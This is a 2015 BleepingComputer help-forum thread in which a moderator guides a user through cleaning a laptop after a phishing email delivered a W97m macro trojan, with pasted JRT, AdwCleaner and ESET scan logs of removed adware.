Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

W97m malicious macro - Reassurance needed


  • Please log in to reply
8 replies to this topic

#1 Milly147

Milly147

  • Members
  • 5 posts
  • OFFLINE
  •  
  • Local time:12:45 AM

Posted 18 August 2015 - 04:17 AM

Hi all,

 

I've done a something stupid. Whilst clearing out my email spam folder, I noticed an email from an uncle who has not emailed me for years, it had his correct email address and although I knew it was in the spam folder for a reason, I thought it was important so moved to inbox and opened and clicked on the link. I Instantly realised what an idiot I was.

 

My antivirus is F-secure, so I ran a full scan. F-secure quarantined a W97m trojan and removed it and restarted computer. Another scan showed all was good. I use this computer to do my internet banking and am still not convinced so I installed Malwarebytes free trial and ran that scan. Malwarebytes found 'non malware' but picked up a huge amount of PUP stuff so, quarantined all of it and removed all of the items.

 

My question to you all is: Have I done enough to remove this virus and can I confidently use this laptop to do my personal stuff like internet banking?

 

Thank you.

 



BC AdBot (Login to Remove)

 


#2 buddy215

buddy215

  • Moderator
  • 13,198 posts
  • ONLINE
  •  
  • Gender:Male
  • Location:West Tennessee
  • Local time:06:45 PM

Posted 18 August 2015 - 05:37 AM

If MBAM found a lot of junk then there is likely much more to be found and removed. Use the programs below to find and remove adware and malware.

 

The safest way to do online banking is using a Linux live CD...DVD...or flash drive. If you are interested in finding out more about that post in the Linux Forum.

 

Use CCleaner to remove Temporary files, program caches, cookies, logs, etc. Use the Default settings. No need to use the

Registry Cleaning Tool...risky. Pay close attention while installing and UNcheck offers of toolbars....especially Google.

After install, open CCleaner and run by clicking on the Run Cleaner button in the bottom right corner.

CCleaner - PC Optimization and Cleaning - Free Download

 

  • download Junkware Removal Tool to your desktop.
  • Shut down your protection software now to avoid potential conflicts.
  • Run the tool by double-clicking it. If you are using Windows Vista, 7, or 8; instead of double-clicking, right-mouse click JRT.exe and select "Run as Administrator".
  • The tool will open and start scanning your system.
  • Please be patient as this can take a while to complete depending on your system's specifications.
  • On completion, a log (JRT.txt) is saved to your desktop and will automatically open.
  • Post the contents of JRT.txt into your next message

Download AdwCleaner by Xplode onto your desktop.

  • Close all open programs and internet browsers.
  • Double click on adwcleaner.exe to run the tool.
  • Click on Scan button.
  • When the scan has finished click on Clean button.
  • Your computer will be rebooted automatically. A text file will open after the restart.
  • Please post the contents of that logfile with your next reply.
  • You can find the logfile at C:\AdwCleaner[S1].txt as well.
  • Hold down Control and click on this link to open ESET OnlineScan in a new window.
  • Click the esetonlinebtn.png button.
  • For alternate browsers only: (Microsoft Internet Explorer users can skip these steps)
  • Click on esetsmartinstaller_enu.exe to download the ESET Smart Installer. Save it to your desktop.
  • Double click on the esetsmartinstaller_enu.png icon on your desktop.
  • Check "YES, I accept the Terms of Use."
  • Click the Start button.
  • Accept any security warnings from your browser.
  • Under scan settings, check "Scan Archives" and "Remove found threats"
  • ESET will then download updates for itself, install itself, and begin scanning your computer. Please be patient as this can take some time.
  • When the scan completes, click List Threats
  • Click Export, and save the file to your desktop using a unique name, such as ESETScan. Include the contents of this report in your next reply.
  • Click the Back button.
  • Click the Finish button.
  • NOTE:Sometimes if ESET finds no infections it will not create a log.

“Every atom in your body came from a star that exploded and the atoms in your left hand probably came from a different star than your right hand. It really is the most poetic thing I know about physics...you are all stardust.”Lawrence M. Krauss
A 1792 U.S. penny, designed in part by Thomas Jefferson and George Washington, reads “Liberty Parent of Science & Industry.”

#3 Milly147

Milly147
  • Topic Starter

  • Members
  • 5 posts
  • OFFLINE
  •  
  • Local time:12:45 AM

Posted 19 August 2015 - 11:14 AM

Hi Buddy215,

 

Thanks for your help, I was able to run the above scans apart from ESET which opened but there was no where to click to download the scanner.

 

Here are the logs for JRT and ADW cleaner.

 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Junkware Removal Tool (JRT) by Malwarebytes

Version: 7.5.6 (08.10.2015:1)

OS: Windows 10 Home x64

Ran by Ours on 19/08/2015 at 15:54:05.01

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

 

 

 

~~~ Services

 

 

~~~ Tasks

Successfully deleted: [Task] C:\WINDOWS\system32\tasks\EgisUpdate

 

 

~~~ Registry Values

Successfully deleted: [Registry Value] HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Toolbar\\{B242FC32-2B60-48EA-A8E3-2E280EDBC48F}

 

 

~~~ Registry Keys

Successfully deleted: [Registry Key] HKEY_CLASSES_ROOT\CLSID\{690EF1CF-5775-4CB3-A5B8-85A63FD0262B}

Successfully deleted: [Registry Key] HKEY_CLASSES_ROOT\CLSID\{B242FC32-2B60-48EA-A8E3-2E280EDBC48F}

Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Clients\StartMenuInternet\Torch

Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{690EF1CF-5775-4CB3-A5B8-85A63FD0262B}

Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Browser Helper Objects\{690EF1CF-5775-4CB3-A5B8-85A63FD0262B}

 

 

~~~ Files

Successfully deleted: [File] C:\Users\Ours\Appdata\Local\google\chrome\user data\default\local storage\chrome-extension_gkojfkhlekighikafcpjkiklfbnlmeio_0.localstorage

Successfully deleted: [File] C:\Users\Ours\Appdata\Local\google\chrome\user data\default\local storage\chrome-extension_gkojfkhlekighikafcpjkiklfbnlmeio_0.localstorage-journal

 

 

~~~ Folders

Successfully deleted: [Folder] C:\Program Files (x86)\movies toolbar

 

 

~~~ Chrome

Successfully deleted: [Folder] C:\Users\Ours\Appdata\Local\Google\Chrome\User Data\Default\Extensions\gkojfkhlekighikafcpjkiklfbnlmeio

[C:\Users\Ours\Appdata\Local\Google\Chrome\User Data\Default\Preferences] - default search provider reset

[C:\Users\Ours\Appdata\Local\Google\Chrome\User Data\Default\Preferences] - Extensions Deleted:

gkojfkhlekighikafcpjkiklfbnlmeio

[C:\Users\Ours\Appdata\Local\Google\Chrome\User Data\Default\Secure Preferences] - default search provider reset

[C:\Users\Ours\Appdata\Local\Google\Chrome\User Data\Default\Secure Preferences] - Extensions Deleted:

[

gkojfkhlekighikafcpjkiklfbnlmeio

]

 

And here is the ADW Cleaner Log.

 

 

# AdwCleaner v5.002 - Logfile created 19/08/2015 at 16:30:48

# Updated 18/08/2015 by Xplode

# Database : 2015-08-18.2 [Server]

# Operating system : Windows 10 Home (x64)

# Username : Ours - ACER1

# Running from : C:\Users\Ours\Desktop\AdwCleaner.exe

# Option : Cleaning

***** [ Services ] *****

 

***** [ Folders ] *****

[-] Folder Deleted : C:\Program Files (x86)\Movies App

***** [ Files ] *****

 

***** [ Shortcuts ] *****

 

***** [ Scheduled tasks ] *****

 

***** [ Registry ] *****

[-] Key Deleted : HKLM\SOFTWARE\Classes\Applications\Torch.exe

[-] Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{6A4BCABA-C437-4C76-A54E-AF31B8A76CB9}

[-] Key Deleted : HKCU\Software\torch

[-] Key Deleted : HKLM\SOFTWARE\torch

[!] Key Not Deleted : [x64] HKCU\Software\torch

***** [ Web browsers ] *****

[-] [C:\Users\Ours\AppData\Local\Google\Chrome\User Data\Default\Web Data] [Search Provider] Deleted : uk.ask.com

*************************

:: Proxy settings cleared

:: Winsock settings cleared

########## EOF - C:\AdwCleaner\AdwCleaner[C1].txt - [1029 bytes] ##########

 

 

Hoping that all above looks ok? I don't know what most of it is though!

 

Thanks

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 



#4 buddy215

buddy215

  • Moderator
  • 13,198 posts
  • ONLINE
  •  
  • Gender:Male
  • Location:West Tennessee
  • Local time:06:45 PM

Posted 19 August 2015 - 11:28 AM

Very important to run Eset Online Scanner...try again. Here is another link for the scanner.....Run ESET Online Scanner

 

  • Hold down Control and click on this link to open ESET OnlineScan in a new window.
  • Click the esetonlinebtn.png button.
  • For alternate browsers only: (Microsoft Internet Explorer users can skip these steps)
  • Click on esetsmartinstaller_enu.exe to download the ESET Smart Installer. Save it to your desktop.
  • Double click on the esetsmartinstaller_enu.png icon on your desktop.
  • Check "YES, I accept the Terms of Use."
  • Click the Start button.
  • Accept any security warnings from your browser.
  • Under scan settings, check "Scan Archives" and "Remove found threats"
  • ESET will then download updates for itself, install itself, and begin scanning your computer. Please be patient as this can take some time.
  • When the scan completes, click List Threats
  • Click Export, and save the file to your desktop using a unique name, such as ESETScan. Include the contents of this report in your next reply.
  • Click the Back button.
  • Click the Finish button.
  • NOTE:Sometimes if ESET finds no infections it will not create a log.

“Every atom in your body came from a star that exploded and the atoms in your left hand probably came from a different star than your right hand. It really is the most poetic thing I know about physics...you are all stardust.”Lawrence M. Krauss
A 1792 U.S. penny, designed in part by Thomas Jefferson and George Washington, reads “Liberty Parent of Science & Industry.”

#5 Milly147

Milly147
  • Topic Starter

  • Members
  • 5 posts
  • OFFLINE
  •  
  • Local time:12:45 AM

Posted 19 August 2015 - 04:06 PM

Hi buddy215,

 

I've managed to download ESET and here is the report:

 

 

C:\Windows.old\Users\Ours\AppData\Local\Temp\DTX\Reporting\ReportingHelper.dll  a variant of Win32/Bundled.Toolbar.Ask.K potentially unsafe application cleaned by deleting - quarantined

C:\Windows.old\Users\Ours\AppData\Local\Temp\nskCF21.tmp\CHAppConfirm.exe  a variant of Win32/Toolbar.SearchSuite.T potentially unwanted application    cleaned by deleting - quarantined

C:\Windows.old\Users\Ours\AppData\Local\Temp\nskCF21.tmp\Helper.dll  a variant of Win32/Toolbar.SearchSuite.X potentially unwanted application    cleaned by deleting - quarantined

C:\Windows.old\Users\Ours\AppData\Local\Temp\nskCF21.tmp\Uninstall.exe     a variant of Win32/TorchMedia potentially unwanted application    cleaned by deleting - quarantined

C:\Windows.old\Users\Ours\AppData\Local\Temp\nslD6C5.tmp\Helper.dll  a variant of Win32/Toolbar.SearchSuite.AD potentially unwanted application   cleaned by deleting - quarantined

C:\Windows.old\Users\Ours\AppData\Local\Temp\nslD6C5.tmp\Starter.exe     Win32/Toolbar.SearchSuite.T potentially unwanted application    cleaned by deleting - quarantined

C:\Windows.old\Users\Ours\AppData\Local\Temp\nsnFD40.tmp\Helper.dll  a variant of Win32/Toolbar.SearchSuite.X potentially unwanted application    cleaned by deleting - quarantined

C:\Windows.old\Users\Ours\AppData\Local\Temp\nsq7BE4.tmp\MoviesAppHelper.dll    a variant of Win32/Toolbar.SearchSuite.AD potentially unwanted application   cleaned by deleting - quarantined

C:\Windows.old\Users\Ours\AppData\Local\Temp\nsq7BE4.tmp\Starter.exe a variant of Win32/Toolbar.SearchSuite.T potentially unwanted application    cleaned by deleting - quarantined

C:\Windows.old\Users\Ours\AppData\Local\Temp\nsqFCD.tmp\Helper.dll   a variant of Win32/Toolbar.SearchSuite.P potentially unwanted application    cleaned by deleting - quarantined

C:\Windows.old\Users\Ours\AppData\Local\Temp\nswD16C.tmp\Helper.dll  a variant of Win32/Toolbar.SearchSuite.AD potentially unwanted application   cleaned by deleting - quarantined

C:\Windows.old\Users\Ours\AppData\Local\Temp\nswD16C.tmp\Starter.exe     Win32/Toolbar.SearchSuite.T potentially unwanted application    cleaned by deleting - quarantined

C:\Windows.old\WINDOWS\Temp\MoviesAppHelper.DLL a variant of Win32/Toolbar.SearchSuite.AD potentially unwanted application   cleaned by deleting - quarantined

C:\Windows.old\WINDOWS\Temp\222917c8\patch_ff.exe    a variant of Win32/Toolbar.SearchSuite.AA.gen potentially unwanted application    cleaned by deleting - quarantined

C:\Windows.old\WINDOWS\Temp\480c22cc\SetupDataMngr_TTB.exe multiple threats     cleaned by deleting - quarantined

C:\Windows.old\WINDOWS\Temp\6633692f\SetupDataMngr_TTB.exe a variant of Win32/Toolbar.SearchSuite.AA.gen potentially unwanted application    cleaned by deleting - quarantined

C:\Windows.old\WINDOWS\Temp\d6686411\SetupDataMngr_TTB.exe a variant of Win32/Toolbar.SearchSuite.AA.gen potentially unwanted application    cleaned by deleting - quarantined

C:\Windows.old\WINDOWS\Temp\dd010ecd\patch_ff.exe    a variant of Win32/Toolbar.SearchSuite.AA.gen potentially unwanted application    cleaned by deleting - quarantined.

 

Is it best to now uninstall ESET, JRT and AdwCleaner?

 

Thanks again for your help

 



#6 buddy215

buddy215

  • Moderator
  • 13,198 posts
  • ONLINE
  •  
  • Gender:Male
  • Location:West Tennessee
  • Local time:06:45 PM

Posted 19 August 2015 - 04:58 PM

I would like to see what MBAM found and removed. You can access the logs and post  it...

I'm thinking that Eset only found what MBAM removed. I would like to confirm that as Eset's results say Windows.old...haven't seen that before.


“Every atom in your body came from a star that exploded and the atoms in your left hand probably came from a different star than your right hand. It really is the most poetic thing I know about physics...you are all stardust.”Lawrence M. Krauss
A 1792 U.S. penny, designed in part by Thomas Jefferson and George Washington, reads “Liberty Parent of Science & Industry.”

#7 buddy215

buddy215

  • Moderator
  • 13,198 posts
  • ONLINE
  •  
  • Gender:Male
  • Location:West Tennessee
  • Local time:06:45 PM

Posted 19 August 2015 - 05:24 PM

I think I figured it out....you upgraded to Windows 10...don't know why I missed that....Eset actually scanned your previous OS files....imagine that.

 

If you are not having a problem with ads, search redirects, etc. then I think you are good to go.

 

You can keep those programs...they do update when needed....or remove...up to you


Edited by buddy215, 19 August 2015 - 05:28 PM.

“Every atom in your body came from a star that exploded and the atoms in your left hand probably came from a different star than your right hand. It really is the most poetic thing I know about physics...you are all stardust.”Lawrence M. Krauss
A 1792 U.S. penny, designed in part by Thomas Jefferson and George Washington, reads “Liberty Parent of Science & Industry.”

#8 Milly147

Milly147
  • Topic Starter

  • Members
  • 5 posts
  • OFFLINE
  •  
  • Local time:12:45 AM

Posted 20 August 2015 - 03:17 AM

Thank you buddy215, for all the help and for taking the time to sift through all that stuff!

 

Feeling much happier now and definitely reassured. :)



#9 buddy215

buddy215

  • Moderator
  • 13,198 posts
  • ONLINE
  •  
  • Gender:Male
  • Location:West Tennessee
  • Local time:06:45 PM

Posted 20 August 2015 - 06:35 AM

You're welcome....the malware linked to in your email is used to download all types of other adware and malware. Fortunate that your antivirus caught it...that doesn't always happen as 

the security programs are ALWAYS playing catch up to identify malware that is being created by the thousands every week.

Happy surfin'


“Every atom in your body came from a star that exploded and the atoms in your left hand probably came from a different star than your right hand. It really is the most poetic thing I know about physics...you are all stardust.”Lawrence M. Krauss
A 1792 U.S. penny, designed in part by Thomas Jefferson and George Washington, reads “Liberty Parent of Science & Industry.”




0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users